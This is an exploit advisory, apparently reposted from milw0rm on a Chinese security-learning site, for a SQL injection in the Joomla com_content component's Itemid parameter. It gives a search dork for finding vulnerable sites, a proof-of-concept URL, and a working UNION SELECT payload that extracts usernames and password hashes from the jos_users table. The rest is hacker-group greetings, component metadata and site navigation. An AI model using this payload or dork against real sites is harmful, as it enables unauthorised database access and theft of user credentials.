Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
发布时间:2016-12-21 来源:查字典编辑
摘要:----------------------------------------------------------------------...

-------------------------------------------------------------------------------------------

Joomla Component com_content SQL Injection Vulnerabity

-------------------------------------------------------------------------------------------

Author : unknown_styler

Dork : inurl:com_content

POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*

------------------------------------------------------------------------------------------------------------------------------------

Greetings : h4ck-y0u.org

side note:

<name>Página de contenido</name>

<author>Projecte Joomla!</author>

<creationDate>July 2004</creationDate>

<copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright>

<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

<authorEmail>admin@joomla.org</authorEmail>

<authorUrl>www.joomla.org</authorUrl>

<version>1.0.0</version>

# milw0rm.com [2008-07-08]

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新Exploit学习
热门Exploit学习
网络安全子分类